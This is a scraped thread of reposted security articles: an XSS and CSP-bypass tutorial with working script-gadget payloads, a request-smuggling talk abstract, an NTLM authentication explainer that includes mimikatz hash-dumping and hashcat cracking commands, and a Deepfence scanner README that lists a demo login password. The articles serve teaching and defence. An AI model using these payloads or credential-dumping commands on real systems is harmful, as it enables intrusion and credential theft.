1 http://127.0.0.1:8000/?injectme=<img src="n/a" onerror="alert('XSS')"/> The image element will be inserted into the DOM and it will error during load, which triggers the onerror event handler. This gives an alert popup saying “XSS”, proving that we can make the app run arbitrary JavaScript. Now enable Content Security Policy by removing the comment on line 5 in index.php. Then reload the page you’ll see that the attack failed. If you open the developer console in your browser, you’ll see a message explaining why. Cool! So what happened? The IMG html element was created, the browser saw an onerror event attribute but refused to execute the JavaScript because of the CSP. Bypassing CSP with an unrealistically simple gadget The CSP in our example says that – JavaScript from the same host (self) is allowed – Dangerous functions such as eval are allowed (unsafe-eval) – All other scripts are blocked – All objects are blocked (e.g. flash) We should add that it is always up to the browser to actually respect the CSP. But if it does, we can’t just inject new JavaScript, end of discussion. But what if we could somehow trigger already existing JavaScript code that is within the CSP white list? If so, we might be able to execute arbitrary JavaScript without violating the policy. This is where the concept of gadgets comes in. A script gadget is a piece of legitimate JavaScript code that can be triggered via for example an HTML injection. Let’s look at a simple example of a gadget to understand the basic idea. 
Assume that the main.js file looked like this instead:

1 /** FILE: main.js **/
2 var ref = document.location.href.split("?injectme=")[1];
3 document.getElementById("app").innerHTML = decodeURIComponent(ref);
4
5 document.addEventListener("DOMContentLoaded", function() {
6 var expression = document.getElementById("expression").getAttribute("data");
7 var parsed = eval(expression);
8 document.getElementById("result").innerHTML = '<p>'+parsed+'</p>';
9 });

The code is basically the same but this time our target also has some kind of math calculator. Notice that only main.js is changed; index.php is the same as before. You can think of the math function as some legacy code that is not really used. As attackers, we can abuse/reuse the math calculator code to reach an eval and execute JavaScript without violating the CSP. We don't need to inject JavaScript. We just need to inject an HTML element with the id "expression" and an attribute named "data". Whatever is inside data will be passed to eval. We give it a shot, and yay! We bypassed the CSP and got an alert! Moving on to realistic script gadgets Websites nowadays include a lot of third-party resources and it is only getting worse. These are all legitimate whitelisted resources even if there is a CSP enforced. Maybe there are interesting gadgets in those millions of lines of JavaScript? Well yes! Lekies et al. (2017) analyzed 16 widely used JavaScript libraries and found multiple gadgets in almost all of them. There are several types of gadgets, and they can be directly useful or require chaining with other gadgets to be useful. String manipulation gadgets: Useful to bypass pattern-based mitigation. Element construction gadgets: Useful to bypass XSS mitigations, for example to create script elements. Function creation gadgets: Can create new Function objects that can later be executed by a second gadget.
JavaScript execution sink gadgets: Similar to the example we just saw; can either stand alone or be the final step in a chain. Gadgets in expression parsers: These abuse the framework-specific expression language used in templates. Let's take a look at another example. We will use the same app but now let's include jQuery Mobile.

1 <?php
2 /** FILE: index.php **/
3 header("Content-Security-Policy: script-src 'self' https://code.jquery.com:443 'unsafe-eval'; object-src 'none';");
4 ?>
5
6 <!DOCTYPE html>
7 <html lang="en">
8 <body>
9 <p id="app"></p>
10 <script src="http://127.0.0.1:8000/main.js"></script>
11 <script src="https://code.jquery.com/jquery-1.8.3.min.js"></script>
12 <script src="https://code.jquery.com/mobile/1.2.1/jquery.mobile-1.2.1.min.js"></script>
13 </body>
14 </html>

1 /** FILE: main.js **/
2 var ref = document.location.href.split("?injectme=")[1];
3 document.getElementById("app").innerHTML = decodeURIComponent(ref);

The CSP has been slightly changed to allow anything from code.jquery.com, and luckily for us, jQuery Mobile has a known script gadget that we can use. This gadget can also bypass CSP with strict-dynamic. Let's start by considering the following HTML.

1 <div data-role=popup id='hello world'></div>

This HTML will trigger code in jQuery Mobile's Popup widget. What might not be obvious is that when you create a popup, the library writes the id attribute into an HTML comment. The code in jQuery responsible for this looks like the below (shown as a screenshot in the original post). This is a code gadget that we can abuse to run JavaScript. We just need to break out of the comment and then we can do whatever we want. Our final payload will look like this:

1 <div data-role=popup id='--!><script>alert("XSS")</script>'></div>

Execute, and boom! Some final words This has been an introduction to code-reuse attacks on the web and we've seen an example of a real-world script gadget in jQuery Mobile.
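The comment breakout can be simulated with a few lines of Python. This is a toy model, not jQuery Mobile's actual code — the placeholder format is made up — but it shows why an id containing `--!>` lets markup escape the comment:

```python
# Toy model of the jQuery Mobile popup gadget: the widget writes the element's
# id into an HTML comment; "--!>" closes a comment early during HTML parsing.
def popup_placeholder(element_id):
    # stand-in for the markup jQuery Mobile emits (the real format differs)
    return "<!-- placeholder for " + element_id + " -->"

benign = popup_placeholder("hello world")
evil = popup_placeholder('--!><script>alert("XSS")</script>')

# "--!>" terminates the comment, so the <script> element that follows is parsed
# as live markup instead of inert comment text
assert "--!><script>" in evil
assert "<script>" not in benign
```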
We've only seen CSP bypasses, but as mentioned, this technique can also be used to bypass HTML sanitizers, WAFs, and XSS filters such as NoScript. If you are interested in diving deeper, I recommend reading the paper from Lekies et al. and specifically looking into gadgets in expression parsers. These gadgets are very powerful, as they rely on neither innerHTML nor eval.

There is no doubt that mitigations such as CSP should be enforced, as they raise the bar for exploitation. However, they must never be relied upon as the single layer of defense. Focus on actually fixing your vulnerabilities. The fundamental principle is that you need to properly encode user-controlled data. The characters in need of encoding will vary based on the context in which the data is inserted. For example, there is a difference between inserting data inside tags (e.g. <div>HERE</div>), inside a quoted attribute (e.g. <div title="HERE"></div>), in an unquoted attribute (e.g. <div title=HERE></div>), or in an event attribute (e.g. <div onmouseenter="HERE"></div>). Make sure to use a framework that is secure by default, and read up on the pitfalls of your specific framework. Also, never use the dangerous functions that completely bypass the built-in security, such as trustAsHtml in Angular and dangerouslySetInnerHTML in React.

Want to learn more? Besides being a security consultant performing penetration tests, Alexander is a popular instructor. If you want to learn more about XSS mitigations and code-reuse attacks, and learn how hackers attack your environment, check out his 3-day training: Secure Web Development and Hacking for Developers.

Sursa: https://blog.truesec.com/2020/04/03/bypassing-modern-xss-mitigations-with-code-reuse-attacks/
  7. HTTP requests are traditionally viewed as isolated, standalone entities. In this session, I'll introduce techniques for remote, unauthenticated attackers to smash through this isolation and splice their requests into others, through which I was able to play puppeteer with the web infrastructure of numerous commercial and military systems, rain exploits on their visitors, and harvest over $70k in bug bounties. By James Kettle Full Abstract & Presentation Materials: https://www.blackhat.com/eu-19/briefi...
8. Windows authentication attacks – part 1

In order to understand attacks such as pass-the-hash, relaying, and Kerberos attacks, one should have pretty good knowledge of the Windows authentication/authorization process. That's what we're going to achieve in this series. In this part we discuss the different types of Windows hashes and focus on the NTLM authentication process.

Arabic

I illustrated most of the concepts in this blog post in Arabic in the following video. It doesn't contain all the details in the post, but it will give you the fundamentals you need to proceed with the next parts.

Windows hashes

LM hashes

LM was the dominant password storage algorithm on Windows until Windows XP/Windows Server 2003, and it has been disabled by default since Windows Vista/Windows Server 2008. LM was a weak hashing algorithm for many reasons; you will figure those reasons out once you know how LM hashing works.

LM hash generation

Let's assume that the user's password is PassWord.

1 – All characters are converted to upper case: PassWord -> PASSWORD
2 – If the password is shorter than 14 characters, it is padded with null characters so its length becomes 14: PASSWORD000000
3 – These 14 characters are split into 2 halves: PASSWOR and D000000
4 – Each half is converted to bits, and after every 7 bits a parity bit (0) is added, so each 7-byte half becomes a 64-bit key. For example: 1101000011 -> 11010000011
5 – Each of these keys is then used to encrypt the string "KGS!@#$%" with the DES algorithm in ECB mode, so the results are:
PASSWOR = E52CAC67419A9A22
D000000 = 4A3B108F3FA6CB6D
6 – The outputs of the two halves are then concatenated, and that makes our LM hash: E52CAC67419A9A224A3B108F3FA6CB6D

You can get the same result using the following python line.
python -c 'from passlib.hash import lmhash; print(lmhash.hash("password"))'

Disadvantages

As you may already suspect, this is a very weak algorithm. Many different passwords map to the same hash; for example, the hashes of the following passwords

Password1
pAssword1
PASSWORD1
PassWord1
...

will all be the same! Let's assume a password like passwordpass123: the upper- and lowercase combinations amount to more than 32000 possibilities, and all of them have the same hash! You can give it a try:

import itertools
len(list(map(''.join, itertools.product(*zip("Passwordpass123".upper(), "Passwordpass123".lower())))))

Also, splitting the password into two halves makes cracking easier, as the attacker only has to brute-force a seven-character password! LM hashes accept only the 95 printable ASCII characters, and since all lowercase characters are converted to upper case, that leaves only 69 possibilities per character: just 7.5 trillion (69^7) possibilities for each half instead of 69^14 for the whole 14 characters. Rainbow tables already exist containing all these possibilities, so cracking LAN Manager hashes isn't a problem at all. Moreover, if the password is seven characters or less, the attacker doesn't even need to brute-force the second half, as it has the fixed value AAD3B435B51404EE.

Example: creating a hash for password123 and cracking it. You will notice that john got me the password "PASSWORD123" in upper case and not "password123"; and yes, both are valid.

Obviously, the whole LM hashing scheme was based on the assumption that no one would reverse it, and that no one would get into the internal network into a MITM position to capture it. As mentioned earlier, LM hashes have been disabled by default since Windows Vista/Windows Server 2008.

NTLM hash (NTHash)

NTHash, AKA NTLM hash, is the algorithm currently used for storing passwords on Windows systems.
While Net-NTLM is the name of the authentication (challenge/response) protocol used between the client and the server. If you have ever dumped hashes or performed a pass-the-hash attack, you have no doubt seen NTLM hashes already. You can obtain them via:

Dumping credentials from memory using mimikatz, e.g. sekurlsa::logonpasswords

Dumping the SAM using
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM
then reading the hashes offline via mimikatz:
lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

And of course via NTDS, where NTLM hashes are stored in Active Directory environments. You're going to need administrator access over the domain controller (domain admin privileges, for example), and you can do this either manually or using DCSync within mimikatz.

NTLM hash generation

Converting a plaintext password into NTLM isn't complicated; it depends mainly on the MD4 hashing algorithm:

1 – The password is converted to Unicode
2 – MD4 is then used to convert it to the NTLM hash, just like MD4(UTF-16-LE(password))

Even if the hash can't be cracked, it can still be abused using the pass-the-hash technique, as illustrated later. Since no salts are used while generating the hash, cracking an NTLM hash can be done either with pre-generated rainbow tables or with hashcat:

hashcat -m 1000 -a 3 hashes.txt

Net-NTLMv1

This isn't used to store passwords; it's actually a challenge/response protocol used for client/server authentication in order to avoid sending the user's hash over the network. That's basically how Net-NTLM authentication works in general. I will discuss how that protocol works in detail, but all you need to know for now is that Net-NTLMv1 isn't used by default anymore, except on some old versions of Windows.

A Net-NTLMv1 hash looks like username::hostname:response:response:challenge

It can't be used directly to pass the hash, yet it can be cracked or relayed, as I will mention later.
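The NT hash construction described above, MD4 over the UTF-16-LE encoding of the password, can be sketched in pure Python. This is an illustrative sketch, not production code; MD4 is implemented inline because many modern OpenSSL builds no longer expose it through hashlib:

```python
import struct

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(data):
    # Pad like MD5: append 0x80, zeros, then the 64-bit little-endian bit length.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", 8 * len(data))

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = [  # (boolean function, round constant, per-step shifts, message word order)
        (F, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]

    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + func(b, c, d) + X[k] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers for the next step
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]

    return struct.pack("<4I", *state)

def nt_hash(password):
    # NTLM: MD4 over the UTF-16-LE encoding of the password, no salt.
    return md4(password.encode("utf-16-le")).hex()

print(nt_hash("password"))  # 8846f7eaee8fb117ad06bdd830b7586c
```

The lack of a salt is exactly why two users with the same password get the same NT hash, and why rainbow tables work against it.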
Since the challenge is variable, you can't use rainbow tables against a Net-NTLMv1 hash, but you can crack it by brute-forcing the password with hashcat:

hashcat -m 5500 -a 3 hashes.txt

This differs from NTLMv1-SSP, in which the server challenge is altered on the client side. NTLMv1 and NTLMv1-SSP are treated differently during cracking, or even downgrading; this will be discussed in the NTLM attacks part.

Net-NTLMv2

A lot of improvements were made over v1; this is the version used on Windows systems nowadays. The authentication steps are the same, except for the challenge-response generation algorithm and the length of the challenge-response, which in this case is variable instead of the fixed length of Net-NTLMv1.

In Net-NTLMv2, many parameters are added by the client, such as a client nonce, the server nonce, a timestamp, and the username, all of which go into the encrypted response; that's why the length of Net-NTLMv2 hashes varies from one user to another. Net-NTLMv2 can't be used for pass-the-hash attacks or for offline relay attacks, due to the security improvements made. But it can still be relayed or cracked; the process is slower, but applicable. I will discuss that later as well.

A Net-NTLMv2 hash can be cracked using

hashcat -m 5600 hash.txt

Net-NTLM authentication in a nutshell

Let's assume that our client (192.168.18.132) is being used to connect to the Windows Server 2008 machine (192.168.18.139). That server isn't domain-joined, which means that the whole authentication process is going to happen between the client and the server, without having to contact any other machine, unlike what may happen in the second scenario. The whole authentication process can be illustrated in the following picture.
Client IP: 192.168.18.132 [Kali Linux]
Server IP: 192.168.18.139 [Windows Server 2008, non-domain joined]

0 – The user enters his/her username and password.
1 – The client initiates a negotiation request with the server; that request includes information about the client's capabilities as well as the dialects, i.e. the protocol versions the client supports.
2 – The server picks the highest dialect and replies through the negotiation response message; then the authentication starts.
3 – The client then negotiates an authentication session with the server to ask for access. This request also contains some information about the client, including the 8-byte NTLM signature ('N', 'T', 'L', 'M', 'S', 'S', 'P', '\0').
4 – The server responds to the request by sending an NTLM challenge.
5 – The client then encrypts that challenge with the hash of the pre-entered password and sends the username, challenge, and challenge-response back to the server (additional data is sent when using Net-NTLMv2).
6 – The server encrypts the challenge as well, using its own copy of the user's hash, which is stored locally on the server in the case of local authentication, or passes the information to the domain controller in the case of domain authentication. It compares the result to the challenge-response: if they are equal, the login is successful.

1-2: Negotiation request/response

Launch Wireshark and initiate the negotiation process using the following python lines:

from impacket.smbconnection import SMBConnection, SMB_DIALECT
myconnection = SMBConnection("jnkfo","192.168.18.139")

These couple of lines represent the first two negotiation steps of the previous picture, without proceeding with the authentication process. Using the "smb or smb2" filter, you will notice that during the negotiation request the client was negotiating over the SMB protocol, yet the server replied using SMB2 and the client renegotiated using SMB2! It's simply the dialects.
By inspecting the packet you will find the following.

As mentioned earlier, the client offers the dialects it supports and the server picks whichever it wants to use; by default it picks the one with the highest level of functionality that both client and server support. If the best is SMB2, then let it be SMB2. You can, however, enforce a certain dialect (assuming the server supports it) using

myconnection.negotiateSession(preferredDialect="NT LM 0.12")

The dialect NT LM 0.12 was sent, the server responded back using SMB, and it will use the same protocol for the rest of the authentication process. Needless to say, the LM response isn't supported by default anymore since Windows Vista/Windows Server 2008.

3 – Session Setup Request (Type 1 message)

The following line will initiate the authentication process:

myconnection.login("Administrator", "P@ssw0rd")

The "Session Setup Request" packet contains information such as the ['N', 'T', 'L', 'M', 'S', 'S', 'P', '\0'] signature, negotiation flags indicating the options supported by the client, and the NTLM message type, which must be 1.

An interesting flag is NTLMSSP_NEGOTIATE_TARGET_INFO, which asks the server to send back some useful information, as will be seen in step 4. Another interesting flag is NEGOTIATE_SIGN, which has a great deal to do with relay attacks, as will be mentioned later.

4 – Session Setup Response (Type 2 message)

In the response, we get back the NTLMSSP signature again. The message type must be 2 in this case. We also get the target name and the target info, thanks to the NTLMSSP_NEGOTIATE_TARGET_INFO flag we sent earlier, which provides us with some wealthy information about the target! A good example is getting the domain name of Exchange servers externally. The most important part is the NTLM challenge, or nonce.
5 – Session Setup Request (Type 3 message)

Long story short, the client needs to prove that it knows the user's password without sending the plaintext password, or even the NTLM hash, directly over the network. So instead it goes through a procedure in which it creates the NT hash, uses it to encrypt the server's challenge, and sends the result back along with the username to the server. That's how the process works in general.

In NTLMv2, the client hashes the user's pre-entered plaintext password into NTLM using the pre-mentioned algorithm, then proceeds with the challenge-response generation. The elements of the NTLMv2 hash are:

– The upper-case username
– The domain or target name

HMAC-MD5 is applied to this combination using the NTLM hash of the user's password as the key, which produces the NTLMv2 hash. A blob is then constructed containing:

– A timestamp
– A client nonce (8 bytes)
– The target information block from the Type 2 message

This blob is concatenated with the challenge from the Type 2 message and encrypted using the NTLMv2 hash as the key via the HMAC-MD5 algorithm. Lastly, this output is concatenated with the previously constructed blob to form the NTLMv2 challenge-response (Type 3 message). So basically:

NTLMv2_response = HMAC-MD5(challenge + blob, using the NTLMv2 hash as the key)
challenge-response = NTLMv2_response + blob

Out of curiosity, and just to know the difference between NTLMv1 and v2: how is the NTLMv1 response calculated?
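Before turning to NTLMv1, the v2 construction just described can be sketched with Python's standard hmac module. The function names and toy inputs below are illustrative only; a real implementation would build the blob (timestamp, client nonce, target info) exactly as [MS-NLMP] specifies:

```python
import hmac
import hashlib

def ntowf_v2(nt_hash, username, domain):
    # NTLMv2 hash: HMAC-MD5 keyed with the NT hash,
    # over UPPER(username) + domain encoded as UTF-16-LE.
    ident = (username.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, ident, hashlib.md5).digest()

def ntlmv2_response(nt_hash, username, domain, server_challenge, blob):
    # blob = timestamp + client nonce + target info (treated as opaque bytes here).
    key = ntowf_v2(nt_hash, username, domain)
    proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return proof + blob  # challenge-response = 16-byte proof || blob

# Toy values just to show the shapes involved (not a real exchange):
nt = bytes.fromhex("E19CCF75EE54E06B06A5907AF13CEF42")
resp = ntlmv2_response(nt, "administrator", "WORKGROUP", b"\x11" * 8, b"\x22" * 28)
print(len(resp))  # 44: a 16-byte proof followed by the 28-byte blob
```

Because the variable-length blob travels with the response, the total length differs per user, which matches the observation above about Net-NTLMv2 hash lengths varying.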
1 – The NTLM hash of the plaintext password is calculated as pre-mentioned, using the MD4 algorithm. Assuming that the password is P@ssw0rd, the NTLM hash will be E19CCF75EE54E06B06A5907AF13CEF42
2 – These 16 bytes are padded to 21 bytes, so it becomes E19CCF75EE54E06B06A5907AF13CEF420000000000
3 – This value is split into three 7-byte thirds:
0xE19CCF75EE54E0
0x6B06A5907AF13C
0xEF420000000000
4 – These 3 values are used to create three 64-bit DES keys by adding a parity bit after every 7 bits, as usual. So for the 1st key, 0xE19CCF75EE54E0 is
11100001 10011100 11001111 01110101 11101110 01010100 11100000
8 parity bits are added, so it becomes
11100000 11001110 00110010 11101110 01011110 01110010 01010010 11000000
In hex: 0xE0CE32EE5E7252C0
The same goes for the other 2 keys.
5 – Each of the three keys is then used to encrypt the challenge obtained from the Type 2 message.
6 – The 3 results are combined to form the 24-byte NTLM response.

So in NTLMv1, no client nonce or timestamp is sent to the server; keep that in mind for later.

6 – Session Setup Response

The server receives the Type 3 message, which contains the challenge-response. The server has its own copy of the user's NTLM hash, the challenge, and all the other information needed to calculate its own challenge-response message. The server then compares the output it has generated with the output it got from the client.

Needless to say, if the NT hash used to encrypt the data on the client side differs from the NT hash of the user's password stored on the server (the user entered the wrong password), the challenge-response won't match the server's output, and thus the user gets an ACCESS_DENIED or LOGON_FAILURE message. If the user entered the correct password, the NT hash will be the same, the encryption (challenge-response) result will be the same on both sides, and the login will succeed.
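The parity-bit key expansion used in step 4 (the same expansion LM hashing uses for its two halves) takes only a few lines to reproduce; a small sketch, checked against the 0xE19CCF75EE54E0 example above:

```python
def expand_des_key(key7):
    # Insert a 0 parity bit after every 7 key bits: 56 bits in, 64 bits out.
    bits = "".join(f"{b:08b}" for b in key7)                        # 56 bits
    padded = "".join(bits[i:i + 7] + "0" for i in range(0, 56, 7))  # 64 bits
    return bytes(int(padded[i:i + 8], 2) for i in range(0, 64, 8))

# First third of the padded NT hash of P@ssw0rd, from the worked example:
third = bytes.fromhex("E19CCF75EE54E0")
print(expand_des_key(third).hex().upper())  # E0CE32EE5E7252C0
```

Since DES ignores the parity bits anyway, inserting a constant 0 is enough; each expanded key is then fed to DES-ECB to encrypt the server challenge (or, in LM, the constant string "KGS!@#$%").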
That's how the full authentication process happens without directly sending or receiving the NTLM hash or the plaintext password over the network.

NTLM authentication in a Windows domain environment

The process is the same as mentioned before, except for the fact that domain users' credentials are stored on the domain controllers. So the challenge-response validation [Type 3 message] will lead to establishing a Netlogon secure channel with the domain controller, where the passwords are saved. The server sends the domain name, username, challenge, and challenge-response to the domain controller, which determines whether the user has the correct password based on the hash saved in the NTDS file (unlike the previous scenario, in which the hash was stored locally in the SAM). So from the server side you will find the following 2 extra RPC_NETLOGON messages to and from the domain controller, and if everything is OK it will just send the session key back to the server in the RPC_NETLOGON response message.

NTLMSSP

To fully understand that mechanism, you can't go without knowing a few things about NTLMSSP. We will discuss this in brief and dig deeper into it in the attacks part.

From Wikipedia:

NTLMSSP (NT LAN Manager (NTLM) Security Support Provider) is a binary messaging protocol used by the Microsoft Security Support Provider Interface (SSPI) to facilitate NTLM challenge-response authentication and to negotiate integrity and confidentiality options. NTLMSSP is used wherever SSPI authentication is used including Server Message Block / CIFS extended security authentication, HTTP Negotiate authentication (e.g. IIS with IWA turned on) and MSRPC services. The NTLMSSP and NTLM challenge-response protocol have been documented in Microsoft's Open Protocol Specification.
SSP is a framework provided by Microsoft to handle that whole NTLM authentication and integrity process. Let's repeat the previous authentication process in terms of the SSPI functions:

1 – The client gets access to the user's credential set via the AcquireCredentialsHandle function.
2 – The Type 1 message is created by calling the InitializeSecurityContext function in order to start the authentication negotiation process, which obtains an authentication token; the message is then forwarded to the server. That message contains the 8-byte NTLMSSP signature mentioned before.
3 – The server receives the Type 1 message, extracts the token, and passes it to the AcceptSecurityContext function, which creates a local security context representing the client, generates the NTLM challenge, and sends it back to the client (Type 2 message).
4 – The client extracts the challenge and passes it to the InitializeSecurityContext function, which creates the challenge-response (Type 3 message).
5 – The server passes the Type 3 message to the AcceptSecurityContext function, which validates whether the user is authenticated, as mentioned earlier.

These functions have nothing to do with the SMB protocol itself; they belong to NTLMSSP, so they are called whenever you trigger authentication using NTLMSSP, no matter which service you're calling.

How does NTLMSSP assure integrity?

To assure integrity, SSP applies a Message Authentication Code (MAC) to the message. This can only be verified by the recipient and prevents manipulation of the message on the fly (in a MITM attack, for example). The signature is generated using a secret key by means of symmetric encryption, and that MAC can only be verified by a party possessing the key (the client and the server).
That key generation varies from NTLMv1 to NTLMv2.

In NTLMv1, the secret key is generated using MD4(NTHash).

In NTLMv2:
1 – The NTLMv2 hash is obtained as mentioned earlier.
2 – The NTLMv2 blob is obtained as also mentioned earlier.
3 – The server challenge is concatenated with the blob and encrypted with HMAC-MD5, using the NTLMv2 hash as the key.
4 – That output is encrypted again with HMAC-MD5, again using the NTLMv2 hash as the key: HMAC-MD5(NTLMv2, OUTPUT_FROM_STEP_3)

And that's the session key. You'll notice that generating that key requires knowing the NT hash in both cases, NTLMv1 and NTLMv2, and the only sides owning that key are the client and the server. The MITM doesn't own it and so can't manipulate the message. This isn't always the case, for sure; it has its own prerequisites and thus its own weaknesses, which will be discussed in the next parts, where we're going to dig deeper into the internals of the authentication/integrity process in order to gain more knowledge of how these features are abused.

Conclusion and references

We've discussed the difference between LM, NTHash, NTLMv1 and NTLMv2 hashes. I went through the NTLM authentication process and made a quick brief of the NTLMSSP's main functions. In the next parts, we will dig deeper into how NTLMSSP works and how we can abuse the NTLM authentication mechanism. If you believe there is any mistake or update that needs to be added, feel free to contact me on Twitter.

References

The NTLM Authentication Protocol and Security Support Provider
Mechanics of User Identification and Authentication: Fundamentals of Identity Management
[MS-NLMP]: NT LAN Manager (NTLM) Authentication Protocol
LM, NTLM, Net-NTLMv2, oh my!

Sursa: https://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/
9. Deepfence Runtime Threat Mapper

The Deepfence Runtime Threat Mapper is a subset of the Deepfence cloud native workload protection platform, released as a community edition. This community edition empowers users with the following features:

Visualization: Visualize Kubernetes clusters, virtual machines, containers and images, running processes, and network connections in near real time.
Runtime Vulnerability Management: Perform vulnerability scans on running containers & hosts as well as container images.
Container Registry Scanning: Check for vulnerabilities in images stored on Docker private registry, AWS ECR, Azure Container Registry and Harbor registries. Support for more container registries, including JFrog and Google Container Registry, will be added soon to the community edition.
CI/CD Scanning: Scan images as part of existing CI/CD pipelines like CircleCI and Jenkins.
Integrations with SIEM, Notification Channels & Ticketing: Ready-to-use integrations with Slack, PagerDuty, HTTP endpoint, Jira, Splunk, ELK, Sumo Logic and Amazon S3.

Live Demo

https://community.deepfence.show/
Username: community@deepfence.io
Password: mzHAmWa!89zRD$KMIZ@ot4SiO

Contents

Architecture
Features
Getting Started
Deepfence Management Console: Pre-Requisites, Installation
Deepfence Agent: Pre-Requisites, Installation
Deepfence Agent on Standalone VM or Host
Deepfence Agent on Amazon ECS
Deepfence Agent on Google GKE
Deepfence Agent on Self-managed/On-premise Kubernetes
How do I use Deepfence?
Register a User
Use Case - Visualization
Use Case - Runtime Vulnerability Management
Use Case - Registry Scanning
Use Case - CI/CD Integration
Use Case - Notification Channel and SIEM Integration
API Support
Security
Support

Architecture

A pictorial depiction of the Deepfence Architecture is below.

Feature Availability

| Features | Runtime Threat Mapper (Community Edition) | Workload Protection Platform (Enterprise Edition) |
| --- | --- | --- |
| Discover & Visualize Running Pods, Containers and Hosts | ✔️ (up to 100 hosts) | ✔️ (unlimited) |
| Runtime Vulnerability Management for hosts/VMs | ✔️ (up to 100 hosts) | ✔️ (unlimited) |
| Runtime Vulnerability Management for containers | ✔️ (unlimited) | ✔️ (unlimited) |
| Container Registry Scanning | ✔️ | ✔️ |
| CI/CD Integration | ✔️ | ✔️ |
| Multiple Clusters | ✔️ | ✔️ |
| Integrations with SIEMs, Slack and more | ✔️ | ✔️ |
| Compliance Automation | ❌ | ✔️ |
| Deep Packet Inspection of Encrypted & Plain Traffic | ❌ | ✔️ |
| API Inspection | ❌ | ✔️ |
| Runtime Integrity Monitoring | ❌ | ✔️ |
| Network Connection & Resource Access Anomaly Detection | ❌ | ✔️ |
| Workload Firewall for Containers, Pods and Hosts | ❌ | ✔️ |
| Quarantine & Network Protection Policies | ❌ | ✔️ |
| Alert Correlation | ❌ | ✔️ |
| Serverless Protection | ❌ | ✔️ |
| Windows Protection | ❌ | ✔️ |
| Highly Available & Multi-node Deployment | ❌ | ✔️ |
| Multi-tenancy & User Management | ❌ | ✔️ |
| Enterprise Support | ❌ | ✔️ |

Getting Started

The Deepfence Management Console is first installed on a separate system. The Deepfence agents are then installed onto bare-metal servers, virtual machines, or Kubernetes clusters where the application workloads are deployed, so that the host systems, or the application workloads, can be scanned for vulnerabilities.
A pictorial depiction of the Deepfence security platform is as follows.

Deepfence Management Console

Pre-Requisites

| Feature | Requirements |
| --- | --- |
| CPU: No of cores | 8 |
| RAM | 16 GB |
| Disk space | At least 120 GB |
| Port range to be opened for receiving data from Deepfence agents | 8000 - 8010 |
| Port to be opened for web browsers to communicate with the Management Console to view the UI | 443 |
| Docker binaries | At least version 18.03 |
| Docker-compose binary | Version 1.20.1 |

Installation

Installing the Management Console is as easy as:

1. Download the file docker-compose.yml to the desired system.
2. Execute the following command: docker-compose -f docker-compose.yml up -d

This is the minimal installation required to quickly get started on scanning various container images. The necessary images may now be downloaded onto this Management Console and scanned for vulnerabilities.

Deepfence Agent

In order to check a host for vulnerabilities, or if docker images or containers that have to be checked for vulnerabilities are stored on different hosts, the Deepfence agent needs to be installed on those hosts.

Pre-Requisites

| Feature | Requirements |
| --- | --- |
| CPU: No of cores | 2 |
| RAM | 4 GB |
| Disk space | At least 30 GB |
| Connectivity | The host on which the Deepfence agent is to be installed is able to communicate with the Management Console on port range 8000-8010. |
| Linux kernel version | >= 4.4 |
| Docker binaries | At least version 18.03 |
| Deepfence Management Console | Installed on a host with IP address a.b.c.d |

Installation

Installation procedure for the Deepfence agent depends on the environment that is being used.
Instructions for installing the Deepfence agent on some of the common platforms are given in detail below.

Deepfence Agent on Standalone VM or Host

Installing the Deepfence agent is now as easy as: in the following docker run command, replace x.x.x.x with the IP address of the Management Console.

docker run -dit --cpus=".2" --name=deepfence-agent --restart on-failure --pid=host --net=host --privileged=true -v /var/log/fenced -v /var/run/docker.sock:/var/run/docker.sock -v /:/fenced/mnt/host/:ro -v /sys/kernel/debug:/sys/kernel/debug:rw -e DF_BACKEND_IP="x.x.x.x" deepfenceio/deepfence_agent_ce:latest

Deepfence Agent on Amazon ECS

For detailed instructions to deploy agents on Amazon ECS, please refer to our Amazon ECS wiki page.

Deepfence Agent on Google GKE

For detailed instructions to deploy agents on Google GKE, please refer to our Google GKE wiki page.

Deepfence Agent on Self-managed/On-premise Kubernetes

For detailed instructions to deploy agents on self-managed/on-premise Kubernetes, please refer to our Self-managed/On-premise Kubernetes wiki page.

How do I use Deepfence?

Now that the Deepfence security platform has been successfully installed, here are the steps to begin.

Register a User

The first step is to register a user with the Management Console. If the Management Console has been installed on a system with IP address x.x.x.x, fire up a browser (Chromium (Chrome, Safari) is the supported browser for now) and navigate to https://x.x.x.x/

After registration, it can take anywhere between 30-60 minutes for the initial vulnerability data to be populated. The download status of the vulnerability data is reflected on the notification panel.

Use Case - Visualization

You can visualize the entire topology of your running VMs, hosts, containers etc. from the topology tab. You can click on individual nodes to initiate various tasks like vulnerability scanning.
Use Case - Runtime Vulnerability Management

From the topology view, runtime vulnerability scanning for running containers & hosts can be initiated using the console dashboard, or by using the APIs. Here is a snapshot of a runtime vulnerability scan on a host node. The vulnerabilities and security advisories for each node can be viewed by navigating to the Vulnerabilities menu, and clicking on an item gives a detailed view. Optionally, users can tag a subset of nodes using user-defined tags and scan that subset, as explained in our user tags wiki page.

Use Case - Registry Scanning

You can scan for vulnerabilities in images stored in Docker private registry, AWS ECR, Azure Container Registry and Harbor from the registry scanning dashboard. First, you will need to click the "Add registry" button and add the credentials to populate the available images. After that, you can select the images to scan and click the scan button as shown in the image below.

Use Case - CI/CD Integration

